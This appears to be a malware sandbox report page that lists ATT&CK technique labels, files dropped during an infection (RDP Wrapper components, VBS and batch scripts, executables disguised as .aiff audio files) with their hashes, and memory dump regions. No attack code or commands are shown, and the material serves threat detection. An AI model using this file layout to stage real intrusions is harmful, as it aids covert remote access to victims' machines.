Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap.bat

Filesize
12KB

MD5
b365fde3be7855f4254d1e4bba45d260

SHA1
b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

SHA256
2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

SHA512
d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap_new.ini

Filesize
181KB

MD5
12afc3fd401d3724956283c33eb796eb

SHA1
66b875153e6ee45c76ae374a95e2cec013ac94e8

SHA256
370681b06f7f69461f745e0ef232c7e69aa6b91a9322903ea1150ba8b2eca120

SHA512
d9957669907fb20b3a3c12770574bacc51de14de8bce426292a0c95131fb354ab369e12303c01b8d3dc394ac3e30371b2d2c3744840a86b296f8938f747cffa4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
7208f91e731475b50b39efec9e62af49

SHA1
f97eb010624371af346fe15e3da884418feb40c1

SHA256
e83b5e14202ffde067e0c7ff9af2583326ed19ac0bf5b858878d40d91298d042

SHA512
72f5fb518a884e26938d429e43aa8f613ba505c97d19967581b9cc0010ce5531e64b1d931c8d863906b40b800e6cdc2ac7e073d36a871f089722c040f7296004

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
fb70dc5e707d18a90cba9c536715657f

SHA1
de697e2421de84a6b8871a3b85abf782b8ad05b2

SHA256
714150672e6c86aee88ca9033adfc34801f689db1377e46ac9230b85a9e4db61

SHA512
dfdb2d3eec2725dec2b2b7c96303ab0886084f95bae81b6e9a1e9aaa6100314c7284fc2102d5eb291711bb6b807471e540617ea0e35085a4717223ce7a309cd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2a037c9034ee2662fac085f4b7345772

SHA1
c27135029bc61835d7d6889372d6ebe1947c5101

SHA256
76b6a7a1face6439c43f8c92d08e5c44d33745181b4e8bdc82d3c9e952eeff16

SHA512
6d335927f2d26413e381fb2c4c15836c198bc9468bc70927074d16649bd562fbefa13ff80181d4e0f90f8ab94592c08b5bed7da5578fc5eadbd7d864abf58aa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
08fce04958766302024384450e293834

SHA1
34315c2d714618e72726149ea6e7a12566cbde2d

SHA256
7c92835641b7402b7b83deb0f6239c433d5447d111e0b037ade233245f7d2317

SHA512
6ab473fe70894a0627d7fd6de454a2d403a52bf9f2a0331408472067323ce2293e30a394a87ef1d787f7461371d637ff5b06722bdd463539338d5750b57dff1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
dce9a1b096c541b3a5d305fe880f76dc

SHA1
8f5f507e434d34a047a6b456b842cfbfcb5133ab

SHA256
43be0d9785878e2238bda34166a44b326a2259b4dc653b833a7e7c0cf9dc520a

SHA512
2fa22c90602238c7f550c81c2a901cbaa2b9276a6eeb3e6f960070aeb0c0fbc60f1f54de45a16f78897ec8c89cebda191af6358770305e155bf93f7d88ca0c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
04abb40201e5ebf0b4ee817b7d3a0d93

SHA1
99d9124e95f6108cab0c86f38e6f938995df9203

SHA256
72e59e6ef53b017ab8a735ccd37537cb9ee7d11675d221f82cd5e5301e7c284a

SHA512
ff98bb05b24813cdace27f4ab7e8630dfdc49e2fd0fd8bdfc8a6ce6a2d7bd2e56481e91cf6b5a2d26813f8f12166fd7b617c92ecba5de099b03a423564e95592

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6b20a3eef6afb4279616f902d8176955

SHA1
17206e0c82d0fbb8c010839f3d1b29b99b839824

SHA256
de38c33acce2cd7ea2eeae3b21300dab61338b386d7eed8989d9a3f3e983c48e

SHA512
66367e4d3643b9f8759db62c3dff3063697c09d771eaf71631b6795fa5e25c8f86036062618c03a16cae3f6404812faa423d22da24768172ef7ab9071ac3afb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3a218433e6d6cbce8fd0c4aa7c278276

SHA1
c55b9b6e3dccaf9b4d0282dcdcf59a1f8fbf7bf2

SHA256
84f593af6cfefa47451b87208d3748db3219f41a88e15953fa434c25f4e09ffa

SHA512
8a3c7139b9bd644323b2648d15ee674c55dee4ea3aeb1afe6d4b992e707fb5d8e5aa3f8a7c9fa75aa1943bb91ece1fddca02936ce747923b4f355e64a5c41be4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
429f13d64c91fdaa1dbaae1d9a5ff11d

SHA1
c362be6635a8bcf27f29f63031215cb92d75cece

SHA256
392ffa25930eaec07d8c47167a0a1879bb99e936343fbf415c769edb79ad268e

SHA512
8680916d2aedd253388b819472c5d6fcebf905113f5b4d3b7e5cbdc1b01234e2cb1810e45850fb086ed77cb1759116dc1527bdf8327f55115217f74f778c2683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e4becdd67f0ead988f6ab167511d27d7

SHA1
3dcd208c87bfbacc1ab59123abb62187042c5045

SHA256
f0f89d3034538fe330b7fd2450ac706c43d3305bd440efb78563190efb520354

SHA512
59b3b3334e14be228e251b91b183bcd7433fc5c8ea7275af828f05ab326d4fcf3e14b0cd32e87d1b870537435c8c39a6a75550d84134d2c5874d5935dfdae2da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5otvywd.x0q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Adunazione.aiff

Filesize
148KB

MD5
26d71780d392b15532aed9e37216f162

SHA1
4ebe507d17371eba5c6885bfcdad1ee3358747e3

SHA256
a6cc34f6068c12b795875fc277023d533e35e4c9a6e042b37c1b9dedb84829cc

SHA512
83c433ddad2b24ffbd1ebe8056d0742f5ce4d9998e6f6a1f50621ab37b0e4378373f692f134edc65719f9ffb2ec820153c5fa38cfb1bdf92aa38a41aa728ebc2

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Amo.aiff

Filesize
353KB

MD5
19c1bac572edf51745b04e858508c2a8

SHA1
5629a972d32cc955f6c22aefb4832cc30cc24b8a

SHA256
f9d52f9539bc9007576369869760d889bc4ea31c641ea051cf6bc496ce58497b

SHA512
7384cf38339a58bc9c077de3394f34c6a286b47d9a59b48bd1171b2964835281aececdf0ac10193415d0d963baf46c1064ed47312ce658b6f0b22d94e6fd1fc4

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Bel.aiff

Filesize
88KB

MD5
e4f38ada217f47c7acf0b1a0c7d86c59

SHA1
c8bc4db75803e0464de7abf074af05b7538957ca

SHA256
ee6a09a3252b0b091b9974bf2809ac6150799a62f3656482b324348a9eb0cb05

SHA512
0cc645f178528121f8f05bcddedfef9ab3b23f018f100de1096dcc63816c2684f70de24d0b1a60af4d944cc4b39402a3532815d99760776f9ffa5c71a84a5430

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Cio.aiff

Filesize
1004KB

MD5
d353f3670fcc64603b64c0a6cca90928

SHA1
1d354a3469a77aa085eb2a71463f86a5e3a28ab6

SHA256
017bf1d9ba8d0d162bc99fd78d5c8a84da0221b1a4864f177cca26aef3ab3c42

SHA512
25cb7776906bf4b885ce5fb794397367ac23157db460b3747f320c3af7d6c9dca3c1814b5d7b3c863726867a748d01ecccd0cd64c2fec0bb1b81886d0078c087

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Mantenere.aiff

Filesize
1.8MB

MD5
320e70e313b3d2e1fbccb281ee8b30bc

SHA1
fab977083428cf69106eae435d08bcfb35899da1

SHA256
37d7beb2569830b9e05f0a7dac9b575d458afaa726ded46f48d238cefae444b2

SHA512
cb736a790fcb7ae09a43f8a33e316fdc96ca1f8b0a508d8e2f4ceeb72429961e13fdc155d8900714efbd5995e43a0887ac873da0f84d03cbb128311750e550da

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Raccontero.aiff

Filesize
921KB

MD5
58b5bf5a115de982ecf7842c982d6dbd

SHA1
c85d93bac730b5e3b4b521ce49f79737890ab878

SHA256
2dd1bdea2c23fec46072a83756ffb2930319b9127536d3177b01444936383992

SHA512
18927f97537a1b33ca0e2d1c6c4f70a38d5e14fff4e193f66b3b81a2bf9e5163370695762e11653b2765acdc70d80cca582d985114ef6e5657d199311cbdd757

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

Filesize
63KB

MD5
0d5df43af2916f47d00c1573797c1a13

SHA1
230ab5559e806574d26b4c20847c368ed55483b0

SHA256
c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc

SHA512
f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Filesize
921KB

MD5
78ba0653a340bac5ff152b21a83626cc

SHA1
b12da9cb5d024555405040e65ad89d16ae749502

SHA256
05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

SHA512
efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Sparvieri.aiff

Filesize
1018KB

MD5
eba2da2ccb2a92b10e917608f89f8758

SHA1
232c57cd8baa2a2017c87274460f3a0b94e1ea33

SHA256
d70efdcff9ece6dba302999cf7121cebb2625a0a8630977adffa0afdb5af589f

SHA512
aedea7fa624a3e05c554ea41c70d7374e8df0532293768101e9b3ff23aa17f0d386246a90f0063222d225a00b2df74a312c97cdc5df3b19912aa07042f515ae7

Download Submit
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Tenue.aiff

Filesize
923KB

MD5
e24236c89ce12eeeb9cfa655716d2994

SHA1
6b5869c4a43de9c394284b5657c6709063b530bf

SHA256
de29e32ce6e527b952adf8d584648c5b5a6805645589e4ac9287bd5481eb5306

SHA512
03a58fbf1e6d7433a4493b567f6e8ff0a740721b50d8ca5776dcd14218a9c0ef84877391973cc3f6702b415c3ea4e549c9f9a88859e0b30f83a3dd4ce8aeafd6

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\1163.vbs

Filesize
9KB

MD5
c3d2e2ccd47e66fba54c582bf5b09a2c

SHA1
176455067dcc15e2cc309acc25a012d23326efbd

SHA256
c8b96c7092dd44a961562790bb1712012ddfd6f6764ac6a57ed0075fb1e832c4

SHA512
d57634cbebbd14070813c779d7e1e7d3ce3c5449bb0189176e601237e5d8a9a92980df1f18d0f8898f3a5541f32104b4f89d1645a0cb355e7b60f90ff2711628

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\13.vbs

Filesize
2KB

MD5
193242114c1738d0ea04aa93659fdd5a

SHA1
a929cc1cfbe44ba8a99117dfd7819776ab45d465

SHA256
c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

SHA512
46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\309.vbs

Filesize
2KB

MD5
d427d2ed9db86d08b38f5f8b5eec4493

SHA1
5cfe9f751bad99009abf1a642eec8f7c67870051

SHA256
7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512

SHA512
fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\547.vbs

Filesize
2KB

MD5
0884b6e1aaf279208fe5f97cbfa85276

SHA1
388f310a0d62a3362db22659e93cb6cb517c21b8

SHA256
490c84854174fa43f15d9ca2967578ed5aa614f5327ccccb5cb6ba589db3aeb6

SHA512
68d515e3660306e7e6c7a5661b41232e6a19788ef05d614962f64873056dcc8a5489c4d1ac22ad2e3f632d6c4e7497a40d0511527f0ac1a8e0dff7366731eead

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll

Filesize
938B

MD5
b36be69249f3d8253169e6406e09152d

SHA1
f8888549533cafaae4f0bbe4af24b12a18e32e3c

SHA256
0af45294212837f1c53988c2034570c73f47265337128275e4d683eccc8f10ca

SHA512
4f491f361c5aa4a6eef1a2dd6bea9596ac37e2de8a536f23ee1723cd72b3da94f54f9cbb555442bdcf411910a42c4137f48d0b3a9c09bf64e7220d1d3f87e49d

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll

Filesize
835B

MD5
66a8f4bb806bbc921eff016fa1e0f9e2

SHA1
94814ea7b649fc3b42c33bc02fc503aed6526290

SHA256
5070b5d840343c5b6336dbf55a5d3f9f84a4e9869ca4e665147c5737e0401b54

SHA512
38a36f90ec2f012c542df05e1095d363408a67de2b0e82b250737efffc3d20c4f46c1fb675b3b6bd724d601c31515f6ae2f9048be52c927377e63ce3d843b53c

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\LzLHkxNG.bat

Filesize
1KB

MD5
72ca5b878a25cb11f47d5fc21661864c

SHA1
6d8369cb5c3ecdd4877d62511239b6e05a345919

SHA256
cc50658ef93a695989c1f8e22a2830636e8f8a22c47ef5e977fdfe15592019d3

SHA512
7a89bbf1b00640b5b0972f81e6709941fe69d8c2ca9ead4796325086ed104b65eff7dd0f0bad157468d0b7af0f338b195b224011e17156e274f9ecc02a7bf9e2

Download Submit
C:\Users\Admin\AppData\Roaming\jVFBF\iDtJpgzIuN.bat

Filesize
1KB

MD5
6d19b2702b77a20b89818484cbc83506

SHA1
f42dbd3ab3c60ea9952e2a0f66826e153f89d943

SHA256
042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f

SHA512
184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
128KB

MD5
dddd741ab677bdac8dcd4fa0dda05da2

SHA1
69d328c70046029a1866fd440c3e4a63563200f9

SHA256
7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

SHA512
6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
188KB

MD5
234237e237aecf593574caf95b1432a2

SHA1
9b925bd5b9d403e90924f613d1d16ecf12066b69

SHA256
d9bb5a5359b3ff1865722b6fbf089f0165c5ce95d1ed9aea624ba57866781ceb

SHA512
b0cc341b68692899887a5750d937a8693f1063187f6341b7ac23512216f38381853309fd01440bd869d8816d5fded56486578f0e1169124ffe06ac92ad6723a0

Download Submit
memory/1072-376-0x00000200A8FC0000-0x00000200A8FE2000-memory.dmp

Filesize
136KB

Download
memory/1448-180-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/1948-335-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2080-159-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/2188-61-0x0000000005020000-0x000000000512A000-memory.dmp

Filesize
1.0MB

Download
memory/2188-60-0x0000000004D30000-0x0000000004D7C000-memory.dmp

Filesize
304KB

Download
memory/2188-59-0x0000000004CF0000-0x0000000004D2C000-memory.dmp

Filesize
240KB

Download
memory/2188-58-0x0000000004C50000-0x0000000004C62000-memory.dmp

Filesize
72KB

Download
memory/2188-57-0x00000000051F0000-0x0000000005808000-memory.dmp

Filesize
6.1MB

Download
memory/2188-53-0x00000000007C0000-0x00000000007DC000-memory.dmp

Filesize
112KB

Download
memory/2260-63-0x00000000005B0000-0x000000000060D000-memory.dmp

Filesize
372KB

Download
memory/2260-68-0x00000000005B0000-0x000000000060D000-memory.dmp

Filesize
372KB

Download
memory/2260-67-0x00000000005B0000-0x000000000060D000-memory.dmp

Filesize
372KB

Download
memory/2260-65-0x00000000005B0000-0x000000000060D000-memory.dmp

Filesize
372KB

Download
memory/2260-77-0x00000000005B0000-0x000000000060D000-memory.dmp

Filesize
372KB

Download
memory/2408-349-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2488-135-0x0000000005940000-0x0000000005C94000-memory.dmp

Filesize
3.3MB

Download
memory/2488-137-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/2488-147-0x0000000007080000-0x0000000007123000-memory.dmp

Filesize
652KB

Download
memory/2500-262-0x0000000005CF0000-0x0000000006044000-memory.dmp

Filesize
3.3MB

Download
memory/2500-268-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/2880-246-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/3052-289-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/3388-347-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3940-121-0x0000000007F30000-0x0000000007F4A000-memory.dmp

Filesize
104KB

Download
memory/3940-101-0x0000000006E90000-0x0000000006EC2000-memory.dmp

Filesize
200KB

Download
memory/3940-120-0x0000000007E40000-0x0000000007E54000-memory.dmp

Filesize
80KB

Download
memory/3940-119-0x0000000007E30000-0x0000000007E3E000-memory.dmp

Filesize
56KB

Download
memory/3940-85-0x00000000033F0000-0x0000000003426000-memory.dmp

Filesize
216KB

Download
memory/3940-118-0x0000000007E00000-0x0000000007E11000-memory.dmp

Filesize
68KB

Download
memory/3940-117-0x0000000007E70000-0x0000000007F06000-memory.dmp

Filesize
600KB

Download
memory/3940-116-0x0000000007C60000-0x0000000007C6A000-memory.dmp

Filesize
40KB

Download
memory/3940-115-0x0000000007C10000-0x0000000007C2A000-memory.dmp

Filesize
104KB

Download
memory/3940-114-0x0000000008290000-0x000000000890A000-memory.dmp

Filesize
6.5MB

Download
memory/3940-113-0x0000000007AC0000-0x0000000007B63000-memory.dmp

Filesize
652KB

Download
memory/3940-112-0x0000000006ED0000-0x0000000006EEE000-memory.dmp

Filesize
120KB

Download
memory/3940-102-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/3940-122-0x0000000007F10000-0x0000000007F18000-memory.dmp

Filesize
32KB

Download
memory/3940-86-0x0000000005B70000-0x0000000006198000-memory.dmp

Filesize
6.2MB

Download
memory/3940-100-0x00000000068C0000-0x00000000068DE000-memory.dmp

Filesize
120KB

Download
memory/3940-99-0x00000000063A0000-0x00000000066F4000-memory.dmp

Filesize
3.3MB

Download
memory/3940-89-0x00000000062F0000-0x0000000006356000-memory.dmp

Filesize
408KB

Download
memory/3940-88-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/3940-87-0x0000000005B00000-0x0000000005B22000-memory.dmp

Filesize
136KB

Download
memory/4328-310-0x000000006EF10000-0x000000006EF5C000-memory.dmp

Filesize
304KB

Download
memory/4580-429-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/4752-359-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/4768-84-0x0000000001030000-0x000000000120F000-memory.dmp

Filesize
1.9MB

Download
memory/4768-82-0x0000000001030000-0x000000000120F000-memory.dmp

Filesize
1.9MB

Download
memory/4768-79-0x0000000001030000-0x000000000120F000-memory.dmp

Filesize
1.9MB

Download